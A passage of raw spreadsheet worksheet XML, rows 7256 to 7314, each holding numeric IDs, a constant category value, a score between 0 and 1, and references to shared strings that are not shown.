      </c>
      <c r="B7256">
        <v>4402</v>
      </c>
      <c r="C7256">
        <v>4402</v>
      </c>
      <c r="D7256">
        <v>4</v>
      </c>
      <c r="E7256">
        <v>0.69480001926422119</v>
      </c>
      <c r="F7256" t="s">
        <v>13461</v>
      </c>
      <c r="G7256" t="s">
        <v>14356</v>
      </c>
      <c r="H7256" t="s">
        <v>14357</v>
      </c>
    </row>
    <row r="7257" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7257" s="1">
        <v>7255</v>
      </c>
      <c r="B7257">
        <v>4403</v>
      </c>
      <c r="C7257">
        <v>4403</v>
      </c>
      <c r="D7257">
        <v>4</v>
      </c>
      <c r="E7257">
        <v>0.96740001440048218</v>
      </c>
      <c r="F7257" t="s">
        <v>13461</v>
      </c>
      <c r="G7257" t="s">
        <v>14358</v>
      </c>
      <c r="H7257" t="s">
        <v>14359</v>
      </c>
    </row>
    <row r="7258" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7258" s="1">
        <v>7256</v>
      </c>
      <c r="B7258">
        <v>4404</v>
      </c>
      <c r="C7258">
        <v>4404</v>
      </c>
      <c r="D7258">
        <v>4</v>
      </c>
      <c r="E7258">
        <v>0.99819999933242798</v>
      </c>
      <c r="F7258" t="s">
        <v>13461</v>
      </c>
      <c r="G7258" t="s">
        <v>14360</v>
      </c>
      <c r="H7258" t="s">
        <v>14361</v>
      </c>
    </row>
    <row r="7259" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7259" s="1">
        <v>7257</v>
      </c>
      <c r="B7259">
        <v>4348</v>
      </c>
      <c r="C7259">
        <v>4348</v>
      </c>
      <c r="D7259">
        <v>4</v>
      </c>
      <c r="E7259">
        <v>0.65479999780654907</v>
      </c>
      <c r="F7259" t="s">
        <v>13461</v>
      </c>
      <c r="G7259" t="s">
        <v>14362</v>
      </c>
      <c r="H7259" t="s">
        <v>14363</v>
      </c>
    </row>
    <row r="7260" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7260" s="1">
        <v>7258</v>
      </c>
      <c r="B7260">
        <v>4517</v>
      </c>
      <c r="C7260">
        <v>4517</v>
      </c>
      <c r="D7260">
        <v>4</v>
      </c>
      <c r="E7260">
        <v>0.99140000343322754</v>
      </c>
      <c r="F7260" t="s">
        <v>13461</v>
      </c>
      <c r="G7260" t="s">
        <v>14364</v>
      </c>
      <c r="H7260" t="s">
        <v>14365</v>
      </c>
    </row>
    <row r="7261" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7261" s="1">
        <v>7259</v>
      </c>
      <c r="B7261">
        <v>4086</v>
      </c>
      <c r="C7261">
        <v>4086</v>
      </c>
      <c r="D7261">
        <v>4</v>
      </c>
      <c r="E7261">
        <v>0.53539997339248657</v>
      </c>
      <c r="F7261" t="s">
        <v>13461</v>
      </c>
      <c r="G7261" t="s">
        <v>14366</v>
      </c>
      <c r="H7261" t="s">
        <v>14367</v>
      </c>
    </row>
    <row r="7262" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7262" s="1">
        <v>7260</v>
      </c>
      <c r="B7262">
        <v>4062</v>
      </c>
      <c r="C7262">
        <v>4062</v>
      </c>
      <c r="D7262">
        <v>4</v>
      </c>
      <c r="E7262">
        <v>0.81480002403259277</v>
      </c>
      <c r="F7262" t="s">
        <v>13461</v>
      </c>
      <c r="G7262" t="s">
        <v>14368</v>
      </c>
      <c r="H7262" t="s">
        <v>14369</v>
      </c>
    </row>
    <row r="7263" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7263" s="1">
        <v>7261</v>
      </c>
      <c r="B7263">
        <v>3648</v>
      </c>
      <c r="C7263">
        <v>3648</v>
      </c>
      <c r="D7263">
        <v>4</v>
      </c>
      <c r="E7263">
        <v>0.694100022315979</v>
      </c>
      <c r="F7263" t="s">
        <v>13461</v>
      </c>
      <c r="G7263" t="s">
        <v>14370</v>
      </c>
      <c r="H7263" t="s">
        <v>14371</v>
      </c>
    </row>
    <row r="7264" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7264" s="1">
        <v>7262</v>
      </c>
      <c r="B7264">
        <v>3650</v>
      </c>
      <c r="C7264">
        <v>3650</v>
      </c>
      <c r="D7264">
        <v>4</v>
      </c>
      <c r="E7264">
        <v>0.61129999160766602</v>
      </c>
      <c r="F7264" t="s">
        <v>13461</v>
      </c>
      <c r="G7264" t="s">
        <v>14372</v>
      </c>
      <c r="H7264" t="s">
        <v>14373</v>
      </c>
    </row>
    <row r="7265" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7265" s="1">
        <v>7263</v>
      </c>
      <c r="B7265">
        <v>3660</v>
      </c>
      <c r="C7265">
        <v>3660</v>
      </c>
      <c r="D7265">
        <v>4</v>
      </c>
      <c r="E7265">
        <v>0.98979997634887695</v>
      </c>
      <c r="F7265" t="s">
        <v>13461</v>
      </c>
      <c r="G7265" t="s">
        <v>14374</v>
      </c>
      <c r="H7265" t="s">
        <v>14375</v>
      </c>
    </row>
    <row r="7266" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7266" s="1">
        <v>7264</v>
      </c>
      <c r="B7266">
        <v>3662</v>
      </c>
      <c r="C7266">
        <v>3662</v>
      </c>
      <c r="D7266">
        <v>4</v>
      </c>
      <c r="E7266">
        <v>0.67269998788833618</v>
      </c>
      <c r="F7266" t="s">
        <v>13461</v>
      </c>
      <c r="G7266" t="s">
        <v>14376</v>
      </c>
      <c r="H7266" t="s">
        <v>14377</v>
      </c>
    </row>
    <row r="7267" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7267" s="1">
        <v>7265</v>
      </c>
      <c r="B7267">
        <v>6362</v>
      </c>
      <c r="C7267">
        <v>6362</v>
      </c>
      <c r="D7267">
        <v>4</v>
      </c>
      <c r="E7267">
        <v>0.62470000982284546</v>
      </c>
      <c r="F7267" t="s">
        <v>13461</v>
      </c>
      <c r="G7267" t="s">
        <v>14378</v>
      </c>
      <c r="H7267" t="s">
        <v>14379</v>
      </c>
    </row>
    <row r="7268" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7268" s="1">
        <v>7266</v>
      </c>
      <c r="B7268">
        <v>6360</v>
      </c>
      <c r="C7268">
        <v>6360</v>
      </c>
      <c r="D7268">
        <v>4</v>
      </c>
      <c r="E7268">
        <v>0.99910002946853638</v>
      </c>
      <c r="F7268" t="s">
        <v>13461</v>
      </c>
      <c r="G7268" t="s">
        <v>14380</v>
      </c>
      <c r="H7268" t="s">
        <v>14381</v>
      </c>
    </row>
    <row r="7269" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7269" s="1">
        <v>7267</v>
      </c>
      <c r="B7269">
        <v>6359</v>
      </c>
      <c r="C7269">
        <v>6359</v>
      </c>
      <c r="D7269">
        <v>4</v>
      </c>
      <c r="E7269">
        <v>0.99930000305175781</v>
      </c>
      <c r="F7269" t="s">
        <v>13461</v>
      </c>
      <c r="G7269" t="s">
        <v>14382</v>
      </c>
      <c r="H7269" t="s">
        <v>14383</v>
      </c>
    </row>
    <row r="7270" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7270" s="1">
        <v>7268</v>
      </c>
      <c r="B7270">
        <v>6358</v>
      </c>
      <c r="C7270">
        <v>6358</v>
      </c>
      <c r="D7270">
        <v>4</v>
      </c>
      <c r="E7270">
        <v>0.99809998273849487</v>
      </c>
      <c r="F7270" t="s">
        <v>13461</v>
      </c>
      <c r="G7270" t="s">
        <v>14384</v>
      </c>
      <c r="H7270" t="s">
        <v>14385</v>
      </c>
    </row>
    <row r="7271" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7271" s="1">
        <v>7269</v>
      </c>
      <c r="B7271">
        <v>3670</v>
      </c>
      <c r="C7271">
        <v>3670</v>
      </c>
      <c r="D7271">
        <v>4</v>
      </c>
      <c r="E7271">
        <v>0.78600001335144043</v>
      </c>
      <c r="F7271" t="s">
        <v>13461</v>
      </c>
      <c r="G7271" t="s">
        <v>14386</v>
      </c>
      <c r="H7271" t="s">
        <v>14387</v>
      </c>
    </row>
    <row r="7272" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7272" s="1">
        <v>7270</v>
      </c>
      <c r="B7272">
        <v>3645</v>
      </c>
      <c r="C7272">
        <v>3645</v>
      </c>
      <c r="D7272">
        <v>4</v>
      </c>
      <c r="E7272">
        <v>0.63099998235702515</v>
      </c>
      <c r="F7272" t="s">
        <v>13461</v>
      </c>
      <c r="G7272" t="s">
        <v>14388</v>
      </c>
      <c r="H7272" t="s">
        <v>14389</v>
      </c>
    </row>
    <row r="7273" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7273" s="1">
        <v>7271</v>
      </c>
      <c r="B7273">
        <v>3673</v>
      </c>
      <c r="C7273">
        <v>3673</v>
      </c>
      <c r="D7273">
        <v>4</v>
      </c>
      <c r="E7273">
        <v>0.99819999933242798</v>
      </c>
      <c r="F7273" t="s">
        <v>13461</v>
      </c>
      <c r="G7273" t="s">
        <v>14390</v>
      </c>
      <c r="H7273" t="s">
        <v>14391</v>
      </c>
    </row>
    <row r="7274" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7274" s="1">
        <v>7272</v>
      </c>
      <c r="B7274">
        <v>6351</v>
      </c>
      <c r="C7274">
        <v>6351</v>
      </c>
      <c r="D7274">
        <v>4</v>
      </c>
      <c r="E7274">
        <v>0.98079997301101685</v>
      </c>
      <c r="F7274" t="s">
        <v>13461</v>
      </c>
      <c r="G7274" t="s">
        <v>14392</v>
      </c>
      <c r="H7274" t="s">
        <v>14393</v>
      </c>
    </row>
    <row r="7275" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7275" s="1">
        <v>7273</v>
      </c>
      <c r="B7275">
        <v>3689</v>
      </c>
      <c r="C7275">
        <v>3689</v>
      </c>
      <c r="D7275">
        <v>4</v>
      </c>
      <c r="E7275">
        <v>0.62080001831054688</v>
      </c>
      <c r="F7275" t="s">
        <v>13461</v>
      </c>
      <c r="G7275" t="s">
        <v>14394</v>
      </c>
      <c r="H7275" t="s">
        <v>14395</v>
      </c>
    </row>
    <row r="7276" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7276" s="1">
        <v>7274</v>
      </c>
      <c r="B7276">
        <v>3697</v>
      </c>
      <c r="C7276">
        <v>3697</v>
      </c>
      <c r="D7276">
        <v>4</v>
      </c>
      <c r="E7276">
        <v>0.84460002183914185</v>
      </c>
      <c r="F7276" t="s">
        <v>13461</v>
      </c>
      <c r="G7276" t="s">
        <v>14396</v>
      </c>
      <c r="H7276" t="s">
        <v>14397</v>
      </c>
    </row>
    <row r="7277" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7277" s="1">
        <v>7275</v>
      </c>
      <c r="B7277">
        <v>3707</v>
      </c>
      <c r="C7277">
        <v>3707</v>
      </c>
      <c r="D7277">
        <v>4</v>
      </c>
      <c r="E7277">
        <v>0.62860000133514404</v>
      </c>
      <c r="F7277" t="s">
        <v>13461</v>
      </c>
      <c r="G7277" t="s">
        <v>14398</v>
      </c>
      <c r="H7277" t="s">
        <v>14399</v>
      </c>
    </row>
    <row r="7278" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7278" s="1">
        <v>7276</v>
      </c>
      <c r="B7278">
        <v>6344</v>
      </c>
      <c r="C7278">
        <v>6344</v>
      </c>
      <c r="D7278">
        <v>4</v>
      </c>
      <c r="E7278">
        <v>0.64740002155303955</v>
      </c>
      <c r="F7278" t="s">
        <v>13461</v>
      </c>
      <c r="G7278" t="s">
        <v>14400</v>
      </c>
      <c r="H7278" t="s">
        <v>14401</v>
      </c>
    </row>
    <row r="7279" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7279" s="1">
        <v>7277</v>
      </c>
      <c r="B7279">
        <v>3716</v>
      </c>
      <c r="C7279">
        <v>3716</v>
      </c>
      <c r="D7279">
        <v>4</v>
      </c>
      <c r="E7279">
        <v>0.52009999752044678</v>
      </c>
      <c r="F7279" t="s">
        <v>13461</v>
      </c>
      <c r="G7279" t="s">
        <v>14402</v>
      </c>
      <c r="H7279" t="s">
        <v>14403</v>
      </c>
    </row>
    <row r="7280" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7280" s="1">
        <v>7278</v>
      </c>
      <c r="B7280">
        <v>3717</v>
      </c>
      <c r="C7280">
        <v>3717</v>
      </c>
      <c r="D7280">
        <v>4</v>
      </c>
      <c r="E7280">
        <v>0.54129999876022339</v>
      </c>
      <c r="F7280" t="s">
        <v>13461</v>
      </c>
      <c r="G7280" t="s">
        <v>14404</v>
      </c>
      <c r="H7280" t="s">
        <v>14405</v>
      </c>
    </row>
    <row r="7281" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7281" s="1">
        <v>7279</v>
      </c>
      <c r="B7281">
        <v>3729</v>
      </c>
      <c r="C7281">
        <v>3729</v>
      </c>
      <c r="D7281">
        <v>4</v>
      </c>
      <c r="E7281">
        <v>0.74210000038146973</v>
      </c>
      <c r="F7281" t="s">
        <v>13461</v>
      </c>
      <c r="G7281" t="s">
        <v>14406</v>
      </c>
      <c r="H7281" t="s">
        <v>14407</v>
      </c>
    </row>
    <row r="7282" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7282" s="1">
        <v>7280</v>
      </c>
      <c r="B7282">
        <v>3738</v>
      </c>
      <c r="C7282">
        <v>3738</v>
      </c>
      <c r="D7282">
        <v>4</v>
      </c>
      <c r="E7282">
        <v>0.59759998321533203</v>
      </c>
      <c r="F7282" t="s">
        <v>13461</v>
      </c>
      <c r="G7282" t="s">
        <v>14408</v>
      </c>
      <c r="H7282" t="s">
        <v>14409</v>
      </c>
    </row>
    <row r="7283" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7283" s="1">
        <v>7281</v>
      </c>
      <c r="B7283">
        <v>3683</v>
      </c>
      <c r="C7283">
        <v>3683</v>
      </c>
      <c r="D7283">
        <v>4</v>
      </c>
      <c r="E7283">
        <v>0.60490000247955322</v>
      </c>
      <c r="F7283" t="s">
        <v>13461</v>
      </c>
      <c r="G7283" t="s">
        <v>14410</v>
      </c>
      <c r="H7283" t="s">
        <v>14411</v>
      </c>
    </row>
    <row r="7284" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7284" s="1">
        <v>7282</v>
      </c>
      <c r="B7284">
        <v>3746</v>
      </c>
      <c r="C7284">
        <v>3746</v>
      </c>
      <c r="D7284">
        <v>4</v>
      </c>
      <c r="E7284">
        <v>0.68919998407363892</v>
      </c>
      <c r="F7284" t="s">
        <v>13461</v>
      </c>
      <c r="G7284" t="s">
        <v>14412</v>
      </c>
      <c r="H7284" t="s">
        <v>13718</v>
      </c>
    </row>
    <row r="7285" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7285" s="1">
        <v>7283</v>
      </c>
      <c r="B7285">
        <v>6376</v>
      </c>
      <c r="C7285">
        <v>6376</v>
      </c>
      <c r="D7285">
        <v>4</v>
      </c>
      <c r="E7285">
        <v>0.99720001220703125</v>
      </c>
      <c r="F7285" t="s">
        <v>13461</v>
      </c>
      <c r="G7285" t="s">
        <v>14413</v>
      </c>
      <c r="H7285" t="s">
        <v>14414</v>
      </c>
    </row>
    <row r="7286" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7286" s="1">
        <v>7284</v>
      </c>
      <c r="B7286">
        <v>3635</v>
      </c>
      <c r="C7286">
        <v>3635</v>
      </c>
      <c r="D7286">
        <v>4</v>
      </c>
      <c r="E7286">
        <v>0.64340001344680786</v>
      </c>
      <c r="F7286" t="s">
        <v>13461</v>
      </c>
      <c r="G7286" t="s">
        <v>14415</v>
      </c>
      <c r="H7286" t="s">
        <v>14416</v>
      </c>
    </row>
    <row r="7287" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7287" s="1">
        <v>7285</v>
      </c>
      <c r="B7287">
        <v>3529</v>
      </c>
      <c r="C7287">
        <v>3529</v>
      </c>
      <c r="D7287">
        <v>4</v>
      </c>
      <c r="E7287">
        <v>0.71899998188018799</v>
      </c>
      <c r="F7287" t="s">
        <v>13461</v>
      </c>
      <c r="G7287" t="s">
        <v>14417</v>
      </c>
      <c r="H7287" t="s">
        <v>14418</v>
      </c>
    </row>
    <row r="7288" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7288" s="1">
        <v>7286</v>
      </c>
      <c r="B7288">
        <v>3537</v>
      </c>
      <c r="C7288">
        <v>3537</v>
      </c>
      <c r="D7288">
        <v>4</v>
      </c>
      <c r="E7288">
        <v>0.84680002927780151</v>
      </c>
      <c r="F7288" t="s">
        <v>13461</v>
      </c>
      <c r="G7288" t="s">
        <v>14419</v>
      </c>
      <c r="H7288" t="s">
        <v>14420</v>
      </c>
    </row>
    <row r="7289" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7289" s="1">
        <v>7287</v>
      </c>
      <c r="B7289">
        <v>3544</v>
      </c>
      <c r="C7289">
        <v>3544</v>
      </c>
      <c r="D7289">
        <v>4</v>
      </c>
      <c r="E7289">
        <v>0.45370000600814819</v>
      </c>
      <c r="F7289" t="s">
        <v>13461</v>
      </c>
      <c r="G7289" t="s">
        <v>14421</v>
      </c>
      <c r="H7289" t="s">
        <v>14422</v>
      </c>
    </row>
    <row r="7290" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7290" s="1">
        <v>7288</v>
      </c>
      <c r="B7290">
        <v>3552</v>
      </c>
      <c r="C7290">
        <v>3552</v>
      </c>
      <c r="D7290">
        <v>4</v>
      </c>
      <c r="E7290">
        <v>0.55140000581741333</v>
      </c>
      <c r="F7290" t="s">
        <v>13461</v>
      </c>
      <c r="G7290" t="s">
        <v>14423</v>
      </c>
      <c r="H7290" t="s">
        <v>14424</v>
      </c>
    </row>
    <row r="7291" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7291" s="1">
        <v>7289</v>
      </c>
      <c r="B7291">
        <v>3554</v>
      </c>
      <c r="C7291">
        <v>3554</v>
      </c>
      <c r="D7291">
        <v>4</v>
      </c>
      <c r="E7291">
        <v>0.59039998054504395</v>
      </c>
      <c r="F7291" t="s">
        <v>13461</v>
      </c>
      <c r="G7291" t="s">
        <v>14425</v>
      </c>
      <c r="H7291" t="s">
        <v>14426</v>
      </c>
    </row>
    <row r="7292" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7292" s="1">
        <v>7290</v>
      </c>
      <c r="B7292">
        <v>6405</v>
      </c>
      <c r="C7292">
        <v>6405</v>
      </c>
      <c r="D7292">
        <v>4</v>
      </c>
      <c r="E7292">
        <v>0.98979997634887695</v>
      </c>
      <c r="F7292" t="s">
        <v>13461</v>
      </c>
      <c r="G7292" t="s">
        <v>14427</v>
      </c>
      <c r="H7292" t="s">
        <v>14428</v>
      </c>
    </row>
    <row r="7293" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7293" s="1">
        <v>7291</v>
      </c>
      <c r="B7293">
        <v>3567</v>
      </c>
      <c r="C7293">
        <v>3567</v>
      </c>
      <c r="D7293">
        <v>4</v>
      </c>
      <c r="E7293">
        <v>0.61570000648498535</v>
      </c>
      <c r="F7293" t="s">
        <v>13461</v>
      </c>
      <c r="G7293" t="s">
        <v>14429</v>
      </c>
      <c r="H7293" t="s">
        <v>14430</v>
      </c>
    </row>
    <row r="7294" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7294" s="1">
        <v>7292</v>
      </c>
      <c r="B7294">
        <v>3568</v>
      </c>
      <c r="C7294">
        <v>3568</v>
      </c>
      <c r="D7294">
        <v>4</v>
      </c>
      <c r="E7294">
        <v>0.50819998979568481</v>
      </c>
      <c r="F7294" t="s">
        <v>13461</v>
      </c>
      <c r="G7294" t="s">
        <v>14431</v>
      </c>
      <c r="H7294" t="s">
        <v>14432</v>
      </c>
    </row>
    <row r="7295" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7295" s="1">
        <v>7293</v>
      </c>
      <c r="B7295">
        <v>3569</v>
      </c>
      <c r="C7295">
        <v>3569</v>
      </c>
      <c r="D7295">
        <v>4</v>
      </c>
      <c r="E7295">
        <v>0.4392000138759613</v>
      </c>
      <c r="F7295" t="s">
        <v>13461</v>
      </c>
      <c r="G7295" t="s">
        <v>14433</v>
      </c>
      <c r="H7295" t="s">
        <v>14434</v>
      </c>
    </row>
    <row r="7296" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7296" s="1">
        <v>7294</v>
      </c>
      <c r="B7296">
        <v>6377</v>
      </c>
      <c r="C7296">
        <v>6377</v>
      </c>
      <c r="D7296">
        <v>4</v>
      </c>
      <c r="E7296">
        <v>0.87480002641677856</v>
      </c>
      <c r="F7296" t="s">
        <v>13461</v>
      </c>
      <c r="G7296" t="s">
        <v>14435</v>
      </c>
      <c r="H7296" t="s">
        <v>14436</v>
      </c>
    </row>
    <row r="7297" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7297" s="1">
        <v>7295</v>
      </c>
      <c r="B7297">
        <v>3571</v>
      </c>
      <c r="C7297">
        <v>3571</v>
      </c>
      <c r="D7297">
        <v>4</v>
      </c>
      <c r="E7297">
        <v>0.4390999972820282</v>
      </c>
      <c r="F7297" t="s">
        <v>13461</v>
      </c>
      <c r="G7297" t="s">
        <v>14437</v>
      </c>
      <c r="H7297" t="s">
        <v>14438</v>
      </c>
    </row>
    <row r="7298" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7298" s="1">
        <v>7296</v>
      </c>
      <c r="B7298">
        <v>3584</v>
      </c>
      <c r="C7298">
        <v>3584</v>
      </c>
      <c r="D7298">
        <v>4</v>
      </c>
      <c r="E7298">
        <v>0.35159999132156372</v>
      </c>
      <c r="F7298" t="s">
        <v>13461</v>
      </c>
      <c r="G7298" t="s">
        <v>14439</v>
      </c>
      <c r="H7298" t="s">
        <v>14440</v>
      </c>
    </row>
    <row r="7299" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7299" s="1">
        <v>7297</v>
      </c>
      <c r="B7299">
        <v>3601</v>
      </c>
      <c r="C7299">
        <v>3601</v>
      </c>
      <c r="D7299">
        <v>4</v>
      </c>
      <c r="E7299">
        <v>0.93680000305175781</v>
      </c>
      <c r="F7299" t="s">
        <v>13461</v>
      </c>
      <c r="G7299" t="s">
        <v>14441</v>
      </c>
      <c r="H7299" t="s">
        <v>14442</v>
      </c>
    </row>
    <row r="7300" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7300" s="1">
        <v>7298</v>
      </c>
      <c r="B7300">
        <v>3608</v>
      </c>
      <c r="C7300">
        <v>3608</v>
      </c>
      <c r="D7300">
        <v>4</v>
      </c>
      <c r="E7300">
        <v>0.64020001888275146</v>
      </c>
      <c r="F7300" t="s">
        <v>13461</v>
      </c>
      <c r="G7300" t="s">
        <v>14443</v>
      </c>
      <c r="H7300" t="s">
        <v>14444</v>
      </c>
    </row>
    <row r="7301" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7301" s="1">
        <v>7299</v>
      </c>
      <c r="B7301">
        <v>3614</v>
      </c>
      <c r="C7301">
        <v>3614</v>
      </c>
      <c r="D7301">
        <v>4</v>
      </c>
      <c r="E7301">
        <v>0.84689998626708984</v>
      </c>
      <c r="F7301" t="s">
        <v>13461</v>
      </c>
      <c r="G7301" t="s">
        <v>14445</v>
      </c>
      <c r="H7301" t="s">
        <v>14446</v>
      </c>
    </row>
    <row r="7302" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7302" s="1">
        <v>7300</v>
      </c>
      <c r="B7302">
        <v>3615</v>
      </c>
      <c r="C7302">
        <v>3615</v>
      </c>
      <c r="D7302">
        <v>4</v>
      </c>
      <c r="E7302">
        <v>0.9593999981880188</v>
      </c>
      <c r="F7302" t="s">
        <v>13461</v>
      </c>
      <c r="G7302" t="s">
        <v>14447</v>
      </c>
      <c r="H7302" t="s">
        <v>14448</v>
      </c>
    </row>
    <row r="7303" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7303" s="1">
        <v>7301</v>
      </c>
      <c r="B7303">
        <v>3625</v>
      </c>
      <c r="C7303">
        <v>3625</v>
      </c>
      <c r="D7303">
        <v>4</v>
      </c>
      <c r="E7303">
        <v>0.45489999651908869</v>
      </c>
      <c r="F7303" t="s">
        <v>13461</v>
      </c>
      <c r="G7303" t="s">
        <v>14449</v>
      </c>
      <c r="H7303" t="s">
        <v>14450</v>
      </c>
    </row>
    <row r="7304" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7304" s="1">
        <v>7302</v>
      </c>
      <c r="B7304">
        <v>3627</v>
      </c>
      <c r="C7304">
        <v>3627</v>
      </c>
      <c r="D7304">
        <v>4</v>
      </c>
      <c r="E7304">
        <v>0.99400001764297485</v>
      </c>
      <c r="F7304" t="s">
        <v>13461</v>
      </c>
      <c r="G7304" t="s">
        <v>14451</v>
      </c>
      <c r="H7304" t="s">
        <v>14452</v>
      </c>
    </row>
    <row r="7305" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7305" s="1">
        <v>7303</v>
      </c>
      <c r="B7305">
        <v>6383</v>
      </c>
      <c r="C7305">
        <v>6383</v>
      </c>
      <c r="D7305">
        <v>4</v>
      </c>
      <c r="E7305">
        <v>0.38069999217987061</v>
      </c>
      <c r="F7305" t="s">
        <v>13461</v>
      </c>
      <c r="G7305" t="s">
        <v>14453</v>
      </c>
      <c r="H7305" t="s">
        <v>14454</v>
      </c>
    </row>
    <row r="7306" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7306" s="1">
        <v>7304</v>
      </c>
      <c r="B7306">
        <v>6381</v>
      </c>
      <c r="C7306">
        <v>6381</v>
      </c>
      <c r="D7306">
        <v>4</v>
      </c>
      <c r="E7306">
        <v>0.62139999866485596</v>
      </c>
      <c r="F7306" t="s">
        <v>13461</v>
      </c>
      <c r="G7306" t="s">
        <v>14455</v>
      </c>
      <c r="H7306" t="s">
        <v>14456</v>
      </c>
    </row>
    <row r="7307" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7307" s="1">
        <v>7305</v>
      </c>
      <c r="B7307">
        <v>6400</v>
      </c>
      <c r="C7307">
        <v>6400</v>
      </c>
      <c r="D7307">
        <v>4</v>
      </c>
      <c r="E7307">
        <v>0.90530002117156982</v>
      </c>
      <c r="F7307" t="s">
        <v>13461</v>
      </c>
      <c r="G7307" t="s">
        <v>14457</v>
      </c>
      <c r="H7307" t="s">
        <v>14458</v>
      </c>
    </row>
    <row r="7308" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7308" s="1">
        <v>7306</v>
      </c>
      <c r="B7308">
        <v>4071</v>
      </c>
      <c r="C7308">
        <v>4071</v>
      </c>
      <c r="D7308">
        <v>4</v>
      </c>
      <c r="E7308">
        <v>0.99260002374649048</v>
      </c>
      <c r="F7308" t="s">
        <v>13461</v>
      </c>
      <c r="G7308" t="s">
        <v>14459</v>
      </c>
      <c r="H7308" t="s">
        <v>14460</v>
      </c>
    </row>
    <row r="7309" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7309" s="1">
        <v>7307</v>
      </c>
      <c r="B7309">
        <v>3750</v>
      </c>
      <c r="C7309">
        <v>3750</v>
      </c>
      <c r="D7309">
        <v>4</v>
      </c>
      <c r="E7309">
        <v>0.81410002708435059</v>
      </c>
      <c r="F7309" t="s">
        <v>13461</v>
      </c>
      <c r="G7309" t="s">
        <v>14461</v>
      </c>
      <c r="H7309" t="s">
        <v>14462</v>
      </c>
    </row>
    <row r="7310" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7310" s="1">
        <v>7308</v>
      </c>
      <c r="B7310">
        <v>3757</v>
      </c>
      <c r="C7310">
        <v>3757</v>
      </c>
      <c r="D7310">
        <v>4</v>
      </c>
      <c r="E7310">
        <v>0.55529999732971191</v>
      </c>
      <c r="F7310" t="s">
        <v>13461</v>
      </c>
      <c r="G7310" t="s">
        <v>14463</v>
      </c>
      <c r="H7310" t="s">
        <v>14464</v>
      </c>
    </row>
    <row r="7311" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7311" s="1">
        <v>7309</v>
      </c>
      <c r="B7311">
        <v>6257</v>
      </c>
      <c r="C7311">
        <v>6257</v>
      </c>
      <c r="D7311">
        <v>4</v>
      </c>
      <c r="E7311">
        <v>0.580299973487854</v>
      </c>
      <c r="F7311" t="s">
        <v>13461</v>
      </c>
      <c r="G7311" t="s">
        <v>14465</v>
      </c>
      <c r="H7311" t="s">
        <v>14466</v>
      </c>
    </row>
    <row r="7312" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7312" s="1">
        <v>7310</v>
      </c>
      <c r="B7312">
        <v>7930</v>
      </c>
      <c r="C7312">
        <v>7930</v>
      </c>
      <c r="D7312">
        <v>4</v>
      </c>
      <c r="E7312">
        <v>0.99830001592636108</v>
      </c>
      <c r="F7312" t="s">
        <v>13461</v>
      </c>
      <c r="G7312" t="s">
        <v>14467</v>
      </c>
      <c r="H7312" t="s">
        <v>14468</v>
      </c>
    </row>
    <row r="7313" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7313" s="1">
        <v>7311</v>
      </c>
      <c r="B7313">
        <v>3970</v>
      </c>
      <c r="C7313">
        <v>3970</v>
      </c>
      <c r="D7313">
        <v>4</v>
      </c>
      <c r="E7313">
        <v>0.65630000829696655</v>
      </c>
      <c r="F7313" t="s">
        <v>13461</v>
      </c>
      <c r="G7313" t="s">
        <v>14469</v>
      </c>
      <c r="H7313" t="s">
        <v>14470</v>
      </c>
    </row>
    <row r="7314" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7314" s="1">
        <v>7312</v>
      </c>
      <c r="B7314">
        <v>3972</v>
      </c>
      <c r="C7314">
        <v>3972</v>
      </c>
      <c r="D7314">
        <v>4</v>
      </c>
      <c r="E7314">
